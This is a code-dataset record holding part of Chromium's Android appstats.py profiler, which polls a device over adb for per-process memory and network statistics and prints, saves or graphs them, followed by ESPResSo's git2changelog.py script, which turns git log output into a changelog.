      cmd = ['cat', '/proc/net/xt_qtaguid/stats']
      net_lines = adb.RunShellCommand(' '.join(cmd), large_output=True)
      net_lines = Utils.FindLines(net_lines, userid)
      for line in net_lines:
        data = re.split('\s+', line.strip())
        # FindLines above is only a substring match; confirm the userid is
        # actually in the userid column.
        if data[userid_idx] != userid:
          continue
        # Background rows fill result indices 0/1, foreground rows 2/3.
        dst_idx_offset = None
        if data[bg_or_fg_idx] == '0':
          dst_idx_offset = 0
        elif data[bg_or_fg_idx] == '1':
          dst_idx_offset = 2
        if dst_idx_offset is None:
          continue
        # Divide by 1000 to report kB (assumes the stats file reports
        # bytes -- TODO confirm). Later matching rows overwrite, not
        # accumulate, earlier ones.
        results[dst_idx_offset] = round(float(data[rx_idx]) / 1000.0, 2)
        results[dst_idx_offset + 1] = round(float(data[tx_idx]) / 1000.0, 2)
    except device_errors.AdbShellCommandFailedError:
      # Best effort: return whatever was collected so far (zeros on failure).
      pass
    return results
class MemoryHelper(object):
  """A helper class to query basic memory usage of a process."""
  @staticmethod
  def QueryMemory(adb, pid):
    """Queries the device for memory information about the process with a pid of
    |pid|. It will query Native, Dalvik, and Pss memory of the process. It
    returns a list of values: [ Native, Pss, Dalvik ]. If the process is not
    found it will return [ 0, 0, 0 ]."""
    results = [0, 0, 0]
    mem_lines = adb.RunShellCommand(' '.join(['dumpsys', 'meminfo', pid]))
    for line in mem_lines:
      match = re.split('\s+', line.strip())
      # Skip data after the 'App Summary' line. This is to fix builds where
      # they have more entries that might match the other conditions.
      if len(match) >= 2 and match[0] == 'App' and match[1] == 'Summary':
        break
      # Work out which result slot (if any) this line feeds, and which
      # column of the line holds the value.
      result_idx = None
      query_idx = None
      if match[0] == 'Native' and match[1] == 'Heap':
        result_idx = 0
        query_idx = -2
      elif match[0] == 'Dalvik' and match[1] == 'Heap':
        result_idx = 2
        query_idx = -2
      elif match[0] == 'TOTAL':
        result_idx = 1
        query_idx = 1
      # If we already have a result, skip it and don't overwrite the data.
      if result_idx is not None and results[result_idx] != 0:
        continue
      if result_idx is not None and query_idx is not None:
        # Divide by 1000: presumably converts dumpsys kB values to the MB
        # shown under the '(mB)' column header -- TODO confirm.
        results[result_idx] = round(float(match[query_idx]) / 1000.0, 2)
    return results
class GraphicsHelper(object):
  """A helper class to query basic graphics memory usage of a process."""
  # TODO(dtrainor): Find a generic way to query/fall back for other devices.
  # Is showmap consistently reliable?
  # Device models whose graphics memory is read from the nvmap debugfs
  # entries, and the candidate locations of those entries.
  __NV_MAP_MODELS = ['Xoom']
  __NV_MAP_FILE_LOCATIONS = ['/d/nvmap/generic-0/clients',
                             '/d/nvmap/iovmm/clients']
  # Device models where 'showmap' exposes the GPU device mappings listed in
  # |__SHOWMAP_KEY_MATCHES|.
  __SHOWMAP_MODELS = ['Nexus S',
                      'Nexus S 4G',
                      'Galaxy Nexus',
                      'Nexus 4',
                      'Nexus 5',
                      'Nexus 7']
  __SHOWMAP_KEY_MATCHES = ['/dev/pvrsrvkm',
                           '/dev/kgsl-3d0']
  @staticmethod
  def __QueryShowmap(adb, pid):
    """Attempts to query graphics memory via the 'showmap' command. It will
    look for |self.__SHOWMAP_KEY_MATCHES| entries to try to find one that
    represents the graphics memory usage. Will return this as a single entry
    array of [ Graphics ]. If not found, will return [ 0 ]."""
    try:
      mem_lines = adb.RunShellCommand(' '.join(['showmap', '-t', pid]))
      for line in mem_lines:
        match = re.split('[ ]+', line.strip())
        if match[-1] in GraphicsHelper.__SHOWMAP_KEY_MATCHES:
          # Column 2 is assumed to be a size in kB, converted to MB here --
          # TODO confirm against the showmap column layout.
          return [ round(float(match[2]) / 1000.0, 2) ]
    except device_errors.AdbShellCommandFailedError:
      # Best effort: fall through and report no graphics memory.
      pass
    return [ 0 ]
  @staticmethod
  def __NvMapPath(adb):
    """Attempts to find a valid NV Map file on the device. It will look for a
    file in |self.__NV_MAP_FILE_LOCATIONS| and see if one exists. If so, it
    will return it."""
    for nv_file in GraphicsHelper.__NV_MAP_FILE_LOCATIONS:
      exists = adb.RunShellCommand(' '.join(['ls', nv_file]))
      # 'ls <path>' echoes the file name back when the path exists.
      if exists[0] == nv_file.split('/')[-1]:
        return nv_file
    return None
  @staticmethod
  def __QueryNvMap(adb, pid):
    """Attempts to query graphics memory via the NV file map method. It will
    find a possible NV Map file from |self.__NvMapPath| and try to parse the
    graphics memory from it. Will return this as a single entry array of
    [ Graphics ]. If not found, will return [ 0 ]."""
    nv_file = GraphicsHelper.__NvMapPath(adb)
    if nv_file:
      mem_lines = adb.RunShellCommand(' '.join(['cat', nv_file]))
      for line in mem_lines:
        match = re.split(' +', line.strip())
        if match[2] == pid:
          # Column 3 is assumed to be a size in bytes, converted to MB --
          # TODO confirm against the nvmap clients file layout.
          return [ round(float(match[3]) / 1000000.0, 2) ]
    return [ 0 ]
  @staticmethod
  def QueryVideoMemory(adb, pid):
    """Queries the device for graphics memory information about the process with
    a pid of |pid|. Not all devices are currently supported. If possible, this
    will return a single entry array of [ Graphics ]. Otherwise it will return
    [ 0 ].
    Please see |self.__NV_MAP_MODELS| and |self.__SHOWMAP_MODELS|
    to see if the device is supported. For new devices, see if they can be
    supported by existing methods and add their entry appropriately. Also,
    please add any new way of querying graphics memory as they become
    available."""
    # Dispatch on the device model to the query method known to work there.
    model = DeviceHelper.GetDeviceModel(adb)
    if model in GraphicsHelper.__NV_MAP_MODELS:
      return GraphicsHelper.__QueryNvMap(adb, pid)
    elif model in GraphicsHelper.__SHOWMAP_MODELS:
      return GraphicsHelper.__QueryShowmap(adb, pid)
    return [ 0 ]
class DeviceSnapshot(object):
  """A class holding a snapshot of memory and network usage for various pids
  that are being tracked. If |show_mem| is True, this will track memory usage.
  If |show_net| is True, this will track network usage.
  Attributes:
    pids: A list of tuples (userid, pid, process name) that should be
          tracked.
    memory: A map of entries of pid => memory consumption array. Right now
            the indices are [ Native, Pss, Dalvik, Graphics ].
    network: A map of entries of userid => network consumption array. Right
             now the indices are [ Download Background, Upload Background,
             Download Foreground, Upload Foreground ].
    timestamp: The amount of time (in seconds) between when this program started
               and this snapshot was taken.
  """
  def __init__(self, adb, pids, show_mem, show_net):
    """Creates an instances of a DeviceSnapshot with an |adb| device connection
    and a list of (userid, pid, process name) tuples."""
    super(DeviceSnapshot, self).__init__()
    self.pids = pids
    self.memory = {}
    self.network = {}
    self.timestamp = Timer.GetTimestamp()
    for (userid, pid, name) in pids:
      if show_mem:
        self.memory[pid] = self.__QueryMemoryForPid(adb, pid)
      # Network usage is tracked per application userid, not per pid, so it
      # is only queried once per userid.
      if show_net and userid not in self.network:
        self.network[userid] = NetworkHelper.QueryNetwork(adb, userid)
  @staticmethod
  def __QueryMemoryForPid(adb, pid):
    """Queries the |adb| device for memory information about |pid|. This will
    return a list of memory values that map to [ Native, Pss, Dalvik,
    Graphics ]."""
    results = MemoryHelper.QueryMemory(adb, pid)
    results.extend(GraphicsHelper.QueryVideoMemory(adb, pid))
    return results
  def __GetProcessNames(self):
    """Returns a list of all of the process names tracked by this snapshot."""
    # Fix: the loop variable was previously named |tuple|, shadowing the
    # builtin type of the same name.
    return [entry[2] for entry in self.pids]
  def HasResults(self):
    """Whether or not this snapshot was tracking any processes."""
    return self.pids
  def GetPidInfo(self):
    """Returns a list of (userid, pid, process name) tuples that are being
    tracked in this snapshot."""
    return self.pids
  def GetNameForPid(self, search_pid):
    """Returns the process name of a tracked |search_pid|. This only works if
    |search_pid| is tracked by this snapshot."""
    for (userid, pid, name) in self.pids:
      if pid == search_pid:
        return name
    return None
  def GetUserIdForPid(self, search_pid):
    """Returns the application userId for an associated |pid|. This only works
    if |search_pid| is tracked by this snapshot and the application userId is
    queryable."""
    for (userid, pid, name) in self.pids:
      if pid == search_pid:
        return userid
    return None
  def IsFirstPidForUserId(self, search_pid):
    """Returns whether or not |search_pid| is the first pid in the |pids| with
    the associated application userId. This is used to determine if network
    statistics should be shown for this pid or if they have already been shown
    for a pid associated with this application."""
    # Relies on |pids| being sorted by userid (see
    # DeviceHelper.GetPidsToTrack), so entries with equal userids are
    # adjacent.
    prev_userid = None
    for idx, (userid, pid, name) in enumerate(self.pids):
      if pid == search_pid:
        return prev_userid != userid
      prev_userid = userid
    return False
  def GetMemoryResults(self, pid):
    """Returns a list of entries about the memory usage of the process specified
    by |pid|. This will be of the format [ Native, Pss, Dalvik, Graphics ]."""
    if pid in self.memory:
      return self.memory[pid]
    return None
  def GetNetworkResults(self, userid):
    """Returns a list of entries about the network usage of the application
    specified by |userid|. This will be of the format [ Download Background,
    Upload Background, Download Foreground, Upload Foreground ]."""
    if userid in self.network:
      return self.network[userid]
    return None
  def GetLongestNameLength(self):
    """Returns the length of the longest process name tracked by this
    snapshot."""
    return len(max(self.__GetProcessNames(), key=len))
  def GetTimestamp(self):
    """Returns the time since program start that this snapshot was taken."""
    return self.timestamp
class OutputBeautifier(object):
  """A helper class to beautify the memory output to various destinations.
  Attributes:
    can_color: Whether or not the output should include ASCII color codes to
               make it look nicer. Default is |True|. This is disabled when
               writing to a file or a graph.
    overwrite: Whether or not the output should overwrite the previous output.
               Default is |True|. This is disabled when writing to a file or a
               graph.
  """
  __MEMORY_COLUMN_TITLES = ['Native',
                            'Pss',
                            'Dalvik',
                            'Graphics']
  __NETWORK_COLUMN_TITLES = ['Bg Rx',
                             'Bg Tx',
                             'Fg Rx',
                             'Fg Tx']
  # ANSI SGR parameter codes used by __TermCode/__ColorString.
  __TERMINAL_COLORS = {'ENDC': 0,
                       'BOLD': 1,
                       'GREY30': 90,
                       'RED': 91,
                       'DARK_YELLOW': 33,
                       'GREEN': 92}
  def __init__(self, can_color=True, overwrite=True):
    """Creates an instance of an OutputBeautifier."""
    super(OutputBeautifier, self).__init__()
    self.can_color = can_color
    self.overwrite = overwrite
    # Number of lines written since the last clear; used by __ClearScreen to
    # move the cursor back up when |overwrite| is on.
    self.lines_printed = 0
    self.printed_header = False
  @staticmethod
  def __FindPidsForSnapshotList(snapshots):
    """Find the set of unique (userid, pid, name) tuples across every snapshot
    in |snapshots|."""
    pids = set()
    for snapshot in snapshots:
      for (userid, pid, name) in snapshot.GetPidInfo():
        pids.add((userid, pid, name))
    return pids
  @staticmethod
  def __TermCode(num):
    """Escapes a terminal code. See |self.__TERMINAL_COLORS| for a list of some
    terminal codes that are used by this program."""
    return '\033[%sm' % num
  @staticmethod
  def __PadString(string, length, left_align):
    """Pads |string| to at least |length| with spaces. Depending on
    |left_align| the padding will appear at either the left or the right of the
    original string."""
    return (('%' if left_align else '%-') + str(length) + 's') % string
  @staticmethod
  def __GetDiffColor(delta):
    """Returns a color based on |delta|. Used to color the deltas between
    different snapshots (grey for no change, green for decrease, red for
    increase)."""
    if not delta or delta == 0.0:
      return 'GREY30'
    elif delta < 0:
      return 'GREEN'
    elif delta > 0:
      return 'RED'
  @staticmethod
  def __CleanRound(val, precision):
    """Round |val| to |precision|. If |precision| is 0, completely remove the
    decimal point."""
    return int(val) if precision == 0 else round(float(val), precision)
  def __ColorString(self, string, color):
    """Colors |string| based on |color|. |color| must be in
    |self.__TERMINAL_COLORS|. Returns the colored string or the original
    string if |self.can_color| is |False| or the |color| is invalid."""
    # NOTE(review): 'ENDC' maps to 0 (falsy), so requesting 'ENDC' here
    # returns the string uncolored, and an unknown color name would raise a
    # KeyError rather than fall through -- confirm both are intended.
    if not self.can_color or not color or not self.__TERMINAL_COLORS[color]:
      return string
    return '%s%s%s' % (
        self.__TermCode(self.__TERMINAL_COLORS[color]),
        string,
        self.__TermCode(self.__TERMINAL_COLORS['ENDC']))
  def __PadAndColor(self, string, length, left_align, color):
    """A helper method to both pad and color the string. See
    |self.__ColorString| and |self.__PadString|."""
    return self.__ColorString(
        self.__PadString(string, length, left_align), color)
  def __OutputLine(self, line):
    """Writes a line to the screen. This also tracks how many times this method
    was called so that the screen can be cleared properly if |self.overwrite| is
    |True|."""
    sys.stdout.write(line + '\n')
    if self.overwrite:
      self.lines_printed += 1
  def __ClearScreen(self):
    """Clears the screen based on the number of times |self.__OutputLine| was
    called."""
    if self.lines_printed == 0 or not self.overwrite:
      return
    # Terminal capability strings: cursor-up, clear-to-end-of-line and
    # carriage-return, fetched via curses.
    key_term_up = curses.tparm(curses.tigetstr('cuu1'))
    key_term_clear_eol = curses.tparm(curses.tigetstr('el'))
    key_term_go_to_bol = curses.tparm(curses.tigetstr('cr'))
    sys.stdout.write(key_term_go_to_bol)
    sys.stdout.write(key_term_clear_eol)
    # Walk back up over everything printed since the last clear.
    for i in range(self.lines_printed):
      sys.stdout.write(key_term_up)
      sys.stdout.write(key_term_clear_eol)
    self.lines_printed = 0
  def __PrintPidLabelHeader(self, snapshot):
    """Returns a header string with columns Pid and Name."""
    if not snapshot or not snapshot.HasResults():
      return
    name_length = max(8, snapshot.GetLongestNameLength())
    header = self.__PadString('Pid', 8, True) + ' '
    header += self.__PadString('Name', name_length, False)
    header = self.__ColorString(header, 'BOLD')
    return header
  def __PrintTimestampHeader(self):
    """Returns a header string with a Timestamp column."""
    header = self.__PadString('Timestamp', 8, False)
    header = self.__ColorString(header, 'BOLD')
    return header
  def __PrintMemoryStatsHeader(self):
    """Returns a header string for memory usage statistics."""
    # Each column is a title plus a '(mB)' unit cell so it lines up with the
    # "value (delta)" pairs printed by __PrintArrayWithDeltas.
    headers = ''
    for header in self.__MEMORY_COLUMN_TITLES:
      headers += self.__PadString(header, 8, True) + ' '
      headers += self.__PadString('(mB)', 8, False)
    return self.__ColorString(headers, 'BOLD')
  def __PrintNetworkStatsHeader(self):
    """Returns a header string for network usage statistics."""
    headers = ''
    for header in self.__NETWORK_COLUMN_TITLES:
      headers += self.__PadString(header, 8, True) + ' '
      headers += self.__PadString('(kB)', 8, False)
    return self.__ColorString(headers, 'BOLD')
  def __PrintTrailingHeader(self, snapshot):
    """Returns a header string for the header trailer (includes timestamp)."""
    if not snapshot or not snapshot.HasResults():
      return
    header = '(' + str(round(snapshot.GetTimestamp(), 2)) + 's)'
    return self.__ColorString(header, 'BOLD')
  def __PrintArrayWithDeltas(self, results, old_results, precision=2):
    """Helper method to return a string of statistics with their deltas. This
    takes two arrays and prints out "current (current - old)" for all entries in
    the arrays."""
    if not results:
      return
    deltas = [0] * len(results)
    if old_results:
      assert len(old_results) == len(results)
      # NOTE(review): indexing |deltas| below relies on map() returning a
      # list, i.e. Python 2 semantics (this file also uses xrange).
      deltas = map(sub, results, old_results)
    output = ''
    for idx, val in enumerate(results):
      round_val = self.__CleanRound(val, precision)
      round_delta = self.__CleanRound(deltas[idx], precision)
      output += self.__PadString(str(round_val), 8, True) + ' '
      output += self.__PadAndColor('(' + str(round_delta) + ')', 8, False,
                                   self.__GetDiffColor(deltas[idx]))
    return output
  def __PrintPidLabelStats(self, pid, snapshot):
    """Returns a string that includes the columns pid and process name for
    the specified |pid|. This lines up with the associated header."""
    if not snapshot or not snapshot.HasResults():
      return
    name_length = max(8, snapshot.GetLongestNameLength())
    name = snapshot.GetNameForPid(pid)
    output = self.__PadAndColor(pid, 8, True, 'DARK_YELLOW') + ' '
    output += self.__PadAndColor(name, name_length, False, None)
    return output
  def __PrintTimestampStats(self, snapshot):
    """Returns a string that includes the timestamp of the |snapshot|. This
    lines up with the associated header."""
    if not snapshot or not snapshot.HasResults():
      return
    timestamp_length = max(8, len("Timestamp"))
    timestamp = round(snapshot.GetTimestamp(), 2)
    output = self.__PadString(str(timestamp), timestamp_length, True)
    return output
  def __PrintMemoryStats(self, pid, snapshot, prev_snapshot):
    """Returns a string that includes memory statistics of the |snapshot|. This
    lines up with the associated header."""
    if not snapshot or not snapshot.HasResults():
      return
    results = snapshot.GetMemoryResults(pid)
    if not results:
      return
    old_results = prev_snapshot.GetMemoryResults(pid) if prev_snapshot else None
    return self.__PrintArrayWithDeltas(results, old_results, 2)
  def __PrintNetworkStats(self, userid, snapshot, prev_snapshot):
    """Returns a string that includes network statistics of the |snapshot|. This
    lines up with the associated header."""
    if not snapshot or not snapshot.HasResults():
      return
    results = snapshot.GetNetworkResults(userid)
    if not results:
      return
    old_results = None
    if prev_snapshot:
      old_results = prev_snapshot.GetNetworkResults(userid)
    return self.__PrintArrayWithDeltas(results, old_results, 0)
  def __PrintNulledNetworkStats(self):
    """Returns a string that includes empty network statistics. This lines up
    with the associated header. This is used when showing statistics for pids
    that share the same application userId. Network statistics should only be
    shown once for each application userId."""
    stats = ''
    for title in self.__NETWORK_COLUMN_TITLES:
      stats += self.__PadString('-', 8, True) + ' '
      stats += self.__PadString('', 8, True)
    return stats
  def __PrintHeaderHelper(self,
                          snapshot,
                          show_labels,
                          show_timestamp,
                          show_mem,
                          show_net,
                          show_trailer):
    """Helper method to concat various header entries together into one header.
    This will line up with a entry built by __PrintStatsHelper if the same
    values are passed to it."""
    titles = []
    if show_labels:
      titles.append(self.__PrintPidLabelHeader(snapshot))
    if show_timestamp:
      titles.append(self.__PrintTimestampHeader())
    if show_mem:
      titles.append(self.__PrintMemoryStatsHeader())
    if show_net:
      titles.append(self.__PrintNetworkStatsHeader())
    if show_trailer:
      titles.append(self.__PrintTrailingHeader(snapshot))
    return ' '.join(titles)
  def __PrintStatsHelper(self,
                         pid,
                         snapshot,
                         prev_snapshot,
                         show_labels,
                         show_timestamp,
                         show_mem,
                         show_net):
    """Helper method to concat various stats entries together into one line.
    This will line up with a header built by __PrintHeaderHelper if the same
    values are passed to it."""
    stats = []
    if show_labels:
      stats.append(self.__PrintPidLabelStats(pid, snapshot))
    if show_timestamp:
      stats.append(self.__PrintTimestampStats(snapshot))
    if show_mem:
      stats.append(self.__PrintMemoryStats(pid, snapshot, prev_snapshot))
    if show_net:
      # Only the first pid of each application userId shows network stats;
      # sibling pids get a nulled-out placeholder so columns still align.
      userid = snapshot.GetUserIdForPid(pid)
      show_userid = snapshot.IsFirstPidForUserId(pid)
      if userid and show_userid:
        stats.append(self.__PrintNetworkStats(userid, snapshot, prev_snapshot))
      else:
        stats.append(self.__PrintNulledNetworkStats())
    return ' '.join(stats)
  def PrettyPrint(self, snapshot, prev_snapshot, show_mem=True, show_net=True):
    """Prints |snapshot| to the console. This will show memory and/or network
    deltas between |snapshot| and |prev_snapshot|. This will also either color
    or overwrite the previous entries based on |self.can_color| and
    |self.overwrite|. If |show_mem| is True, this will attempt to show memory
    statistics. If |show_net| is True, this will attempt to show network
    statistics."""
    self.__ClearScreen()
    if not snapshot or not snapshot.HasResults():
      self.__OutputLine("No results...")
      return
    # Output Format
    show_label = True
    show_timestamp = False
    show_trailer = True
    self.__OutputLine(self.__PrintHeaderHelper(snapshot,
                                               show_label,
                                               show_timestamp,
                                               show_mem,
                                               show_net,
                                               show_trailer))
    for (userid, pid, name) in snapshot.GetPidInfo():
      self.__OutputLine(self.__PrintStatsHelper(pid,
                                                snapshot,
                                                prev_snapshot,
                                                show_label,
                                                show_timestamp,
                                                show_mem,
                                                show_net))
  def PrettyFile(self,
                 file_path,
                 snapshots,
                 diff_against_start,
                 show_mem=True,
                 show_net=True):
    """Writes |snapshots| (a list of DeviceSnapshots) to |file_path|.
    |diff_against_start| determines whether or not the snapshot deltas are
    between the first entry and all entries or each previous entry. This output
    will not follow |self.can_color| or |self.overwrite|. If |show_mem| is
    True, this will attempt to show memory statistics. If |show_net| is True,
    this will attempt to show network statistics."""
    if not file_path or not snapshots:
      return
    # Output Format
    show_label = False
    show_timestamp = True
    show_trailer = False
    pids = self.__FindPidsForSnapshotList(snapshots)
    # Disable special output formatting for file writing.
    can_color = self.can_color
    self.can_color = False
    with open(file_path, 'w') as out:
      # One section per tracked pid, each with its own header and rows.
      for (userid, pid, name) in pids:
        out.write(name + ' (' + str(pid) + '):\n')
        out.write(self.__PrintHeaderHelper(None,
                                           show_label,
                                           show_timestamp,
                                           show_mem,
                                           show_net,
                                           show_trailer))
        out.write('\n')
        prev_snapshot = None
        for snapshot in snapshots:
          has_mem = show_mem and snapshot.GetMemoryResults(pid) is not None
          has_net = show_net and snapshot.GetNetworkResults(userid) is not None
          if not has_mem and not has_net:
            continue
          out.write(self.__PrintStatsHelper(pid,
                                            snapshot,
                                            prev_snapshot,
                                            show_label,
                                            show_timestamp,
                                            show_mem,
                                            show_net))
          out.write('\n')
          # When diffing against the start, keep the first snapshot as the
          # baseline; otherwise advance it each row.
          if not prev_snapshot or not diff_against_start:
            prev_snapshot = snapshot
        out.write('\n\n')
    # Restore special output formatting.
    self.can_color = can_color
  def PrettyGraph(self, file_path, snapshots):
    """Creates a pdf graph of |snapshots| (a list of DeviceSnapshots) at
    |file_path|. This currently only shows memory stats and no network
    stats."""
    # Import these here so the rest of the functionality doesn't rely on
    # matplotlib
    from matplotlib import pyplot
    from matplotlib.backends.backend_pdf import PdfPages
    if not file_path or not snapshots:
      return
    pids = self.__FindPidsForSnapshotList(snapshots)
    pp = PdfPages(file_path)
    # One page per tracked pid, with one line per memory column.
    for (userid, pid, name) in pids:
      figure = pyplot.figure()
      ax = figure.add_subplot(1, 1, 1)
      ax.set_xlabel('Time (s)')
      ax.set_ylabel('MB')
      ax.set_title(name + ' (' + pid + ')')
      mem_list = [[] for x in range(len(self.__MEMORY_COLUMN_TITLES))]
      timestamps = []
      for snapshot in snapshots:
        results = snapshot.GetMemoryResults(pid)
        if not results:
          continue
        timestamps.append(round(snapshot.GetTimestamp(), 2))
        assert len(results) == len(self.__MEMORY_COLUMN_TITLES)
        for idx, result in enumerate(results):
          mem_list[idx].append(result)
      colors = []
      for data in mem_list:
        colors.append(ax.plot(timestamps, data)[0])
        # NOTE(review): xrange is Python 2 only, like map() above.
        for i in xrange(len(timestamps)):
          ax.annotate(data[i], xy=(timestamps[i], data[i]))
      figure.legend(colors, self.__MEMORY_COLUMN_TITLES)
      pp.savefig()
    pp.close()
def main(argv):
  """Poll memory/network stats for matching processes on an Android device.

  Parses command-line flags, then loops: picks a device to track, finds the
  pids matching --pid/--process, takes a DeviceSnapshot and pretty-prints it
  until the time limit expires or the user hits CTRL-C. Optionally writes a
  PDF graph and/or a text dump of all collected snapshots at the end.
  """
  parser = argparse.ArgumentParser()
  parser.add_argument('--process',
                      dest='procname',
                      help="A (sub)string to match against process names.")
  parser.add_argument('-p',
                      '--pid',
                      dest='pid',
                      type=Validator.ValidateNonNegativeNumber,
                      help='Which pid to scan for.')
  parser.add_argument('-d',
                      '--device',
                      dest='device',
                      help='Device serial to scan.')
  parser.add_argument('-t',
                      '--timelimit',
                      dest='timelimit',
                      type=Validator.ValidateNonNegativeNumber,
                      help='How long to track memory in seconds.')
  parser.add_argument('-f',
                      '--frequency',
                      dest='frequency',
                      default=0,
                      type=Validator.ValidateNonNegativeNumber,
                      help='How often to poll in seconds.')
  parser.add_argument('-s',
                      '--diff-against-start',
                      dest='diff_against_start',
                      action='store_true',
                      help='Whether or not to always compare against the'
                      ' original memory values for deltas.')
  parser.add_argument('-b',
                      '--boring-output',
                      dest='dull_output',
                      action='store_true',
                      help='Whether or not to dull down the output.')
  parser.add_argument('-k',
                      '--keep-results',
                      dest='no_overwrite',
                      action='store_true',
                      help='Keeps printing the results in a list instead of'
                      ' overwriting the previous values.')
  parser.add_argument('-g',
                      '--graph-file',
                      dest='graph_file',
                      type=Validator.ValidatePdfPath,
                      help='PDF file to save graph of memory stats to.')
  parser.add_argument('-o',
                      '--text-file',
                      dest='text_file',
                      type=Validator.ValidatePath,
                      help='File to save memory tracking stats to.')
  parser.add_argument('-m',
                      '--memory',
                      dest='show_mem',
                      action='store_true',
                      help='Whether or not to show memory stats. True by'
                      ' default unless --n is specified.')
  parser.add_argument('-n',
                      '--net',
                      dest='show_net',
                      action='store_true',
                      help='Whether or not to show network stats. False by'
                      ' default.')
  args = parser.parse_args()
  # Add a basic filter to make sure we search for something.
  if not args.procname and not args.pid:
    args.procname = 'chrome'
  # Make sure we show memory stats if nothing was specifically requested.
  if not args.show_net and not args.show_mem:
    args.show_mem = True
  devil_chromium.Initialize()
  curses.setupterm()
  printer = OutputBeautifier(not args.dull_output, not args.no_overwrite)
  sys.stdout.write("Running... Hold CTRL-C to stop (or specify timeout).\n")
  try:
    last_time = time.time()
    adb = None
    old_snapshot = None
    snapshots = []
    # NOTE(review): compares Timer.GetTimestamp() (presumably seconds since
    # script start) against --timelimit; confirm Timer's epoch semantics.
    while not args.timelimit or Timer.GetTimestamp() < float(args.timelimit):
      # Check if we need to track another device
      device = DeviceHelper.GetDeviceToTrack(args.device)
      if not device:
        adb = None
      elif not adb or device != str(adb):
        # A new device appeared (or the tracked one changed): reset history.
        #adb = adb_wrapper.AdbWrapper(device)
        adb = device_utils.DeviceUtils(device)
        old_snapshot = None
        snapshots = []
        try:
          adb.EnableRoot()
        except device_errors.CommandFailedError:
          sys.stderr.write('Unable to run adb as root.\n')
          sys.exit(1)
      # Grab a snapshot if we have a device
      snapshot = None
      if adb:
        pids = DeviceHelper.GetPidsToTrack(adb, args.pid, args.procname)
        snapshot = None
        if pids:
          snapshot = DeviceSnapshot(adb, pids, args.show_mem, args.show_net)
      if snapshot and snapshot.HasResults():
        snapshots.append(snapshot)
      printer.PrettyPrint(snapshot, old_snapshot, args.show_mem, args.show_net)
      # Transfer state for the next iteration and sleep
      delay = max(1, args.frequency)
      if snapshot:
        # Account for the time the snapshot itself took.
        delay = max(0, args.frequency - (time.time() - last_time))
      time.sleep(delay)
      last_time = time.time()
      # With --diff-against-start the baseline snapshot is kept forever.
      if not old_snapshot or not args.diff_against_start:
        old_snapshot = snapshot
  except KeyboardInterrupt:
    pass
  if args.graph_file:
    printer.PrettyGraph(args.graph_file, snapshots)
  if args.text_file:
    printer.PrettyFile(args.text_file,
                       snapshots,
                       args.diff_against_start,
                       args.show_mem,
                       args.show_net)
# Entry point. main() returns None, so sys.exit() exits with status 0.
if __name__ == '__main__':
  sys.exit(main(sys.argv))
|
ds-hwang/chromium-crosswalk
|
tools/android/appstats.py
|
Python
|
bsd-3-clause
| 37,289
|
[
"Galaxy"
] |
a6f5897741a67309e37d4f869f8dd1e0ec67c17b2f2758b1751a3ddd71826261
|
#!/usr/bin/env python3
# Copyright (C) 2012-2019 The ESPResSo project
# Copyright (C) 2011 Olaf Lenz
# Copyright 2008 Marcus D. Hanwell <marcus@cryos.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import re
import os

# Execute git log with the desired command line options.
fin = os.popen(
    'git log --summary --stat --no-merges --date=short 3.0.1..', 'r')

# Parser state used to locate the blocks of each commit object.
authorFound = False
dateFound = False
messageFound = False
filesFound = False
message = ""
messageNL = False
files = ""
prevAuthorLine = ""
commitId = ""

# The main part of the loop
for line in fin:
    # The commit line marks the start of a new commit object.
    m = re.match('^commit (.*)$', line)
    if m is not None:
        commitId = m.group(1)
        # Start all over again...
        authorFound = False
        dateFound = False
        messageFound = False
        messageNL = False
        message = ""
        filesFound = False
        files = ""
        continue
    # Match the author line and extract the part we want
    m = re.match(r'^Author:\s*(.*)\s*$', line)
    if m is not None:
        author = m.group(1)
        authorFound = True
        continue
    # Match the date line
    m = re.match(r'^Date:\s*(.*)\s*$', line)
    if m is not None:
        date = m.group(1)
        dateFound = True
        continue
    # The svn-id and sign-off lines are ignored.
    # BUG FIX: re.search() returns a Match object or None, never an int;
    # comparing against ">= 0" raises TypeError on Python 3.
    if re.search('git-svn-id:|^Signed-off-by', line) is not None:
        continue
    # Extract the actual commit message for this commit
    if not (authorFound and dateFound and messageFound):
        # Find the commit message if we can
        if len(line) == 1:
            # A blank line ends the message once we have already seen one.
            if messageNL:
                messageFound = True
            else:
                messageNL = True
        elif len(line) == 4:
            # NOTE(review): treats a 4-char line as the end-of-message marker;
            # presumably the "    " indentation-only line git emits — confirm.
            messageFound = True
        else:
            if not message:
                message = line.strip()
            else:
                message = message + " " + line.strip()
    # If this line is hit all of the files have been stored for this commit
    if re.search('files changed', line) is not None:
        filesFound = True
        continue
    # Collect the files for this commit. FIXME: Still need to add +/- to files
    elif authorFound and dateFound and messageFound:
        fileList = re.split(r' \| ', line, 2)
        if len(fileList) > 1:
            if files:
                files = files + ", " + fileList[0].strip()
            else:
                files = fileList[0].strip()
    # All of the parts of the commit have been found - write out the entry
    if authorFound and dateFound and messageFound and filesFound:
        # First the author line, only outputted if it is the first for that
        # author on this day
        authorLine = date + " " + author
        if not prevAuthorLine:
            print(authorLine)
        elif authorLine == prevAuthorLine:
            pass
        else:
            print("\n" + authorLine)
        # Assemble the actual commit message line(s) and limit the line length
        # to 80 characters.
        commitLine = "* " + files + ": " + message
        i = 0
        commit = ""
        while i < len(commitLine):
            if len(commitLine) < i + 78:
                commit = commit + "\n " + commitLine[i:len(commitLine)]
                break
            index = commitLine.rfind(' ', i, i + 78)
            if index > i:
                commit = commit + "\n " + commitLine[i:index]
                i = index + 1
            else:
                # BUG FIX: the slice must be relative to i (was the absolute
                # range [i:78], which is wrong/empty once i >= 78).
                commit = commit + "\n " + commitLine[i:i + 78]
                i = i + 78
        # Write out the commit line
        print(commit)
        # Now reset all the variables ready for a new commit block.
        authorFound = False
        dateFound = False
        messageFound = False
        messageNL = False
        message = ""
        filesFound = False
        files = ""
        commitId = ""
        prevAuthorLine = authorLine

# Close the input and output lines now that we are finished.
fin.close()
|
espressomd/espresso
|
maintainer/git2changelog.py
|
Python
|
gpl-3.0
| 4,666
|
[
"ESPResSo"
] |
e23d580849e4db45c0331ced4232984e8d8c771bcd1a466854fb272564ac4fc8
